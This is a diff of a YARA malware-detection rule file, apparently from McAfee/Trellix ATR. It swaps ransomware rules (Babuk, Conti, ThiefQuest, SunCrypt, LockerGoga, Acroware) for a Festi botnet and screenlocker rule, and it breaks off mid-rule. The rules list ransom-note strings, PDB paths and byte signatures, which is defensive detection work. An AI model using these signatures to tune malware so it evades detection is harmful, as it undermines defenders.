-		description = "Rule to detect the ScreenLocker Acroware"
+		description = "Rule to detect the Festi botnet based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "76eb69eb-dfe7-5629-bf2d-d20574efd662"
-		date = "2018-08-28"
+		id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6"
+		date = "2013-03-04"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_acroware.yar#L1-L29"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "f9efcfc5328e6502cbbbff752a940ac221e437d8732052fc265618f6a6ad72ae"
-		logic_hash = "582f3544cf1f8066b1e9ac04c3a4cc9f0ba96804ca53bc3746b433df9c33e0a1"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Acroware"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii
-		$s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii
-		$s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii
-		$s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s5 = "webserver, after 72 hours thedecryption key will get removed and your personal" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB ) and all of them
-}
-rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE
-{
-	meta:
-		description = "Rule to detect Babuk Locker packed"
-		author = "McAfee ATR"
-		id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3"
-		date = "2021-02-19"
-		modified = "2021-02-24"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5"
-		logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953"
-		score = 75
-		quality = 70
-		tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE"
-		rule_version = "v1"
-		malware_family = "Ransom:Win/Babuk"
-		malware_type = "Ransom"
-		mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129"
-
-	strings:
-		$first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 }
-		$first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
-		$first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3}
-		$first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3}
-		$files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 }
-		$files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????}
-		$files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??}
-
-	condition:
-		filesize <= 300KB and any of ( $first_stage* ) and any of ( $files_encryption* )
-}
-
-rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE
-{
-	meta:
-		description = "Conti ransomware is havnig capability too scan and encrypt oover the network"
-		author = "McAfee ATR team"
-		id = "8fc6943d-fb99-5957-929b-4c264d9fba2d"
-		date = "2020-07-09"
-		modified = "2020-10-12"
-		reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Conti.yar#L3-L37"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe"
-		logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Conti"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$string1 = "HOW_TO_DECRYPTP" fullword ascii
-		$string2 = "The system is LOCKED." fullword ascii
-		$string3 = "The network is LOCKED." fullword ascii
-		$code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 }
-		$code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 }
-		$code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.number_of_sections == 5 and ( pe.imphash ( ) == "30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ( $code* ) ) )
-}
-rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect the Evilquest/ThiefQuest malware"
-		author = "McAfee ATR Team"
-		id = "09b074f7-6899-574d-a7d6-4414509aaa78"
-		date = "2020-07-09"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_thiefquest.yar#L1-L46"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b"
-		logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25"
-		score = 75
-		quality = 68
-		tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "keylogger, backdoor, ransomware"
-		actor_type = "Cybercrime"
-		malware_family = "Ransom:OSX/ThiefQuest"
-
-	strings:
-		$pattern_0 = { 01c1 48 83c102 48 }
-		$pattern_1 = { 8c1471 80c1c1 98 1c8c }
-		$pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 }
-		$pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 }
-		$pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 }
-		$pattern_5 = { d898ab5c757b 2f f26f 5d }
-		$pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 }
-		$pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 }
-		$pattern_8 = { 01c1 48 83c101 48 }
-		$pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 }
-		$pattern_10 = { fd d7 43bd18fd6f06 7937 fa }
-		$pattern_11 = { 01c2 48 83c201 bf01000000 }
-		$pattern_12 = { d89825ed4469 29f1 5c e12d }
-		$pattern_13 = { d8992062f7f9 73ff 90 085fc6 }
-		$pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? }
-		$pattern_15 = { 01c1 41 89c8 44 }
-		$pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 }
-		$pattern_17 = { 01c1 48 8b75a8 48 }
-		$pattern_18 = { 0000 48 8945f8 e9???????? }
-		$pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 }
-		$pattern_20 = { 01c2 48 83c203 bf01000000 }
-		$pattern_21 = { 4a7888 ab 23e7 cf 11f3 }
-		$pattern_22 = { d8982fbf222d 49 92 1d25b42bba }
-		$pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 }
-
-	condition:
-		7 of them and filesize < 124322606
-}
-rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect SunCrypt ransomware"
-		author = "McAfee ATR Team"
-		id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660"
-		date = "2020-10-02"
-		modified = "2020-11-02"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L1-L25"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Suncrypt"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
-		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
-
-	strings:
-		$pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C475263????78??58445A63????78??37475263????78??5847554D5A4678??4C475263????78??584A5938????79??58475263??????6B??????38????7A??44475261526178??576C64??????70??584752616475??6B??????63????71??4847526170??78??5772??73??4672??6E47526131??????5775??38????72??2F475262????78??5778??38????73??58475262????78??5730??????4674??6E475262????78??5733????5A4675??434E5265??5136??4D46414142512F31????69????????????51554F677A??514141555039????496C466E4931????46446F4977??414146442F565169????????????6152516A??5877??5039????46442F565169????????????52434C514269????????????4932????502F2F2F31??????667A??565A434677??515A67??32????414142414855433677??4C526677??68????????2F2B????667A??31????46454974??434974??454974??4E4474??47484A4D69??????????414969??????????5838????36??6661414164??69??????????????6A??565978??2F31????68????????32????61414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C4249476F4561414177??41434C5252434C514169??????????????74??454974??435039????5039????495045454974??45496C42494974??45494E34??414231????74??454974??43476F49575776??42594E38????77??64??474C5252434C514169??????????????534A51534472??476F4561414177??41434C5252434C514169??????????????6F412F31????67??????69??????????456769??????????67????48554636??67??4141434C5252434C51416A??63????4C5252442F63????4C5252442F63????6F30????4141495045444974??454974??434974??454974??43412B??5352534E524167??69????????????38????73??69??????????6C462F4974??454974??43412B??51415935????????4F5774??2F4369??????????????45516130????4B4974??454974??454974??6D414E4D4168????????5838????74??454974??494974??6D414E4D416778??36??59424141434478??7A??73??64??6C4145414141417A??412B????50372F2F34??466C4D6E44565976??555974??434974??434974??45496C49424974??434974??42412B??414431????67??4164??517A??4F73??69??????????414569??????????6B??????67??????554969????????????4969??????????68????????4164??517A?? }
-
-	condition:
-		uint16( 0 ) == 0x6441 and all of them
-}
-rule TRELLIX_ARC_RANSOM_Suncrypt_Decryptor : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect SunCrypt ransomware decryptor"
-		author = "McAfee ATR Team"
-		id = "ec0d3811-6083-5537-bf29-32ee02d43b5e"
-		date = "2020-10-02"
-		modified = "2020-11-02"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L27-L50"
+		reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_festi_botnet_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "59d1193bb0f8d3983a181394b5dd5247470d9e118cc4fe0674167f162bcdb6e1"
+		hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99"
+		logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Suncrypt"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Festi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "a0f99367b0a0a358ed6e5ae25904016d02aef6aa7c0423c34aa3ec3fd6354310"
 
 	strings:
-		$pattern = { 558BEC81EC88000000837D08008BC10F101A89957CFFFFFF0F104A10898578FFFFFF0F1062200F106A300F115D940F114DA40F1165B40F116DC40F8E340200008B45D08B4DC48B55B08945F88B45CC8945E08B45C88945E88B45C08945F08B45BC8945F48B45B8538B5DA88945EC8B45AC568B75A48945D48B45A0578975DC8945E48B459403C68BF033F18B4DB4C1C61003CE8BF9337DDCC1C70C03C78945DC33C6C1C0088945D803C18B4DEC89458833C7C1C0078945848B459803C38BF03375E8C1C61003CE8BF933FBC1C70C03C78945E833C6C1C00889458C03C18B4DF48BD88945EC33DF8B459C0345D48B7DE48BF03375E003FAC1C61003CEC1C307894DF4334DD4C1C10C03C133F08945908B45F0C1C6088975800375F433CEC1C107894DE08B4DF833CFC1C11003C133D08945F0C1C20C8D043A8B7DF033C88945E48B45DCC1C10803F9894DF833D7C1C20703C38BC8334DF8C1C11003F18975FC315DFC8B5DFCC1C30C03C389459433C1C1C0088945F88945D003C633D88945F48945BC8B45E80345E08BC8C1C307334DD8C1C110895DFC895DA88B5DEC8D340F8BFE337DE0C1C70C03C789459833C1C1C0088945D88945C403C68B758833F88945F08945C08B459003C2C1C7078BC8897DD4334D8CC1C11003F1897DAC8B7DE433D6037D84C1C20C03C289459C33C1C1C0088945E88945C803C633D08945B48BC7C1C207334580C1C01003D88BCB334D84C1C10C03F98BF7897DE433F0897DA0C1C60803DE8975E08975CC895DEC8B45088BF333F1895DB88B5DFC488B4DD8C1C6078975DC8975A489450885C00F8F30FEFFFF0F106DC48B8578FFFFFF0F1065B45F0F105D948955B00F104DA48B957CFFFFFF5E5B0F10020F105210660FFED80F104230660FFED10F104A200F1118660FFECC660FFEC50F1150100F1148200F1140308BE55DC3CCCCCCCCCCCCCCCCCCCC558BEC83E4F081EC58020000568BC18B4D1489442420578BFA897C24283D000100000F82680A0000660F6E07660F70C800660F6E4704660F70D000660F6E4708660F70D800660F6E470C660F70E000660F6E4710660F70E800660F6E47148B7508660F70F000660F6E47188B550C660F70F8008D8EC0000000660F6E471C660F70C0000F29842430010000660F6E4720660F70C0000F29842440010000660F6E4724660F70C0000F29842450010000660F6E4728660F70C0000F29842460010000660F6E472C894C240C8D8AC0000000660F70C000894C241C8D8E800000000F29842470010000660F6E4738894C24148D8A80000000660F70C000894C24188D4E400F29842480010000660F6E473C894C242C8D4A40660F70C000C1E8080F298C24A00100000F299424B00100000F299C24C00100000F29A424D00100000F29AC24E00100000F29B424F00100000F29BC24000200000F29842490010000894C24108944242066660F1F8400000000000F2884243001000033C00B47308B4F340F298424800000000F288424400100000F298424900000000F288424500100000F294424600F288424600100000F298424100100000F28842470010000894C244C8944244883C0040F298C24D0000000F30F7E4C244883D1000F298424200100000F288424900100000F299424E00000000F2815A02B4200660F6CC90F29442430660FD4D10F2805B02B42000F29A424A0000000660FD4C10F28E20F29B42400010000660F62E0660F6AD00F28F40F299C24F00000000F28DD0F28AC2480010000660F62F20F297C24700F28FE660F6AE2894F348B4D140F295C24500F29AC24C00000000F29A424B00000000F29BC24400200000F29A4245002000089473085C90F84820400000F287C24708BC166900F28D3660FFE9424D0000000660FEFF2660F380035C02B42000F28DE660FFE9C24900000000F28C3660FEF4424500F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942400010000660FFE9424E0000000660FEFF0660F380035D02B42000F29842490000000660FEFE2660F380025C02B42000F28C60F29742470660FFEC30F28DC660FFE5C24600F29842410020000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424000100000F298C24200200000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D7660FFE9424F0000000660FEFE0660F380025D02B42000F29442460660FEFEA660F38002DC02B42000F28C40F29A424B0000000660FFEC30F28DD660FFE9C24100100000F29842430020000660FEFC10F28F0660F72F007660F72D619660FEBF00F28C3660FEFC70F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FFE9424A0000000660FEFE8660F38002DD02B42000F294424500F28E50F29AC24C0000000660FFEE30F28C4660FEFC10F28F8660F72F007660F72D719660FEBF80F286C2430660FEFEA660F38002DC02B42000F28DD660FFE9C24200100000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28D6660FEFE8660FFE942490000000660F38002DD02B42000F298424A00000000F296C2430660FFEEB0F28C5660FEFC10F28C8660F72F007660F72D119660FEBC80F28442430660FEFC20F298C2480000000660F380005C02B42000F28D80F29442430660FFEDC0F28C3660FEFC60F287424700F28C8660F72F00C660F72D114660FEBC80F284424300F28E1660FFEE20F28D7660FFE542460660FEFC4660F380005D02B4200660FEFF20F29A424D0000000660F380035C02B42000F29442430660FFEC30F298424100100000F28DE660FEFC1660FFEDD0F28C8660F72F007660F72D119660FEBC80F28C3660FEFC70F298C24000100000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942480000000660FEFF00F298424E0000000660F380035D02B42000F28C6660FFEC30F29842420010000660FEFC10F28F8660F72F007660F72D719660FEBF8660FFE5424500F28A424B00000000F28AC24C0000000660FEFE2660F380025C02B42000F28DC660FFE9C24100200000F28C3660FEF8424800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F28942420020000660FFE9424A0000000660FEFE00F298424F0000000660FEFEA660F380025D02B4200660F38002DC02B42000F29A424B00000000F28C4660FFEC30F28DD660FFE9C24300200000F29842490000000660FEFC10F28C8660F72F007660F72D119660FEBC80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 }
+		$pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
 }
-rule TRELLIX_ARC_Lockergogaransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE
 {
 	meta:
-		description = "LockerGoga Ransomware"
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "bdf5da34-adf0-5731-820f-96511e647a83"
-		date = "2019-03-20"
+		description = "Rule to detect the screenlocker 5h311_1nj3c706"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "50bbe8e1-4721-5277-b786-d2a2d9acf917"
+		date = "2018-08-07"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_LockerGoga.yar#L1-L36"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ba15c27f26265f4b063b65654e9d7c248d0d651919fafb68cb4765d1e057f93f"
-		logic_hash = "165fa0fa044b2e0d2344626c2064162f23e13dc17310a772b703dbbe9457bd99"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/LockerGoga"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
